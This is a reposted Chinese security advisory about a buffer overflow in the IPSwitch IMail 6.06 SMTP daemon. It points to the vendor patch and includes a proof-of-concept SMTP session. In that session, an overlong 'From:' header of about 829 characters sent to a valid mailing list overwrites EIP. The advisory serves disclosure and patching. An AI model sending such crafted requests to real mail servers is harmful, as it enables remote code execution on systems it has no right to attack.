IMail SMTP 缓冲区溢出漏洞 (APP,缺陷) (转)

IMail SMTP服务器被发现存在缓冲区溢出漏洞,远程攻击者可通过发送特制请求执行任意代码。该漏洞源于SMTP守护进程未正确处理输入数据。受影响版本为IPSwitch IMail 6.06。官方已发布补丁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

IMail SMTP 缓冲区溢出漏洞 (APP,缺陷) (转)[@more@]

IMail SMTP 缓冲区溢出漏洞 (APP,缺陷)
 
涉及程序
SMTP daemon
 
描述:
IMail SMTP 服务器缓冲区溢出导致执行攻击者代码漏洞
 
详细:
IPSwitch IMail 是一个流行的电子邮件服务器,通过 web 接口为客户提供邮件服务。并且 IMail 与大多数常见的电子邮
协议兼容,例如:SMTP, POP3, IMAP4, LDAP等。今天发现它存在缓冲区溢出漏洞。问题在于 IMail SMTP 守护进程在处
理输入数据时没有进行正确的边界检查。远程攻击者利用这点能使 IMail SMTP 服务器发生缓冲区溢出从而执行攻击者提
供的代码。


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


为了重写 EIP,必须知道有效的邮件列表名(附:读者可向 imailsrv@example.com 索取邮件列表名,内容写“list" 即
可)。将邮件列表名放入下列 SMTP 请求中,将能成功导致 IMail 服务缓冲区溢出。
Client SMTP Session -> IMAIL SMTP
----------------------------------------------------
helo eeyerulez
mailfrom: <>
rcpt to: valid_mailing_list
data
From: [buffer] example.com
To: Whatever
wohooo!
.
quit
-----------------------------------------------------
Where [buffer] is 829 or so characters.

受影响系统
IPSwitch's IMail 6.06 SMTP daemon
 
解决方案:
CNNS 建议您立即下载安装补丁
[ul]http://ipswitch.com/support/IMail/patch-upgrades.html [/ul]


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752043/viewspace-989511/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10752043/viewspace-989511/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值